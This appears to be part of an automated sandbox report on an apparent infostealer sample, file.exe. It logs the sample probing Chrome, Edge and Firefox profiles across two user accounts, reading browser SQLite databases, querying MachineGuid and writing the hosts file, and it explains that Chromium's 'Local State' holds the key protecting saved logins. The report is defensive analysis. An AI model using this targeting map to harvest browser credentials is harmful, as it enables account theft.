              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exe  Queries volume information (VolumeInformation). The sandbox logs every query, and the sample repeats the same pass many times over the run. Each pass first touches the volume roots, then the browser profile directories of every account under C:\Users, i.e. not only the account the sample runs as (user) but also the second account present on the analysis machine (jones). For Chrome and Edge the target is the profile root plus "Local State", which is where Chromium keeps the DPAPI-wrapped key that protects the saved-login and cookie databases; for Firefox the jones profile is walked directory by directory.
                Volume roots
                  C:\
                  \Device\CdRom0\
                  C:\Users
                Chrome and Edge profiles, account "user"
                  C:\Users\user\AppData\Local\Google\Chrome\User Data
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State
                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data
                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State
                Chrome and Edge profiles, account "jones"
                  C:\Users\jones\AppData\Local\Google\Chrome\User Data
                  C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State
                  C:\Users\jones\AppData\Local\Microsoft\Edge\User Data
                  C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State
                Firefox profile, account "jones" (C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ ...)
                  saved-telemetry-pings
                  security_state
                  sessionstore-backups
                  storage
                  storage\default
                  storage\permanent
                  storage\permanent\chrome
                  storage\permanent\chrome\idb
                  storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                  storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                  storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                  storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                  storage\to-be-removed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information (VolumeInformation). Unlike file.exe, the PowerShell child queries no user data; its targets are the system catalog files and the module assemblies it loads (AppV client, BitLocker, System.Data), several of them more than once:
                  C:\
                  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
                  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat
                  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
                  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
                  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
                  C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
                  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts

              Stealing of Sensitive Information

              Source: Yara match | File source: file.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
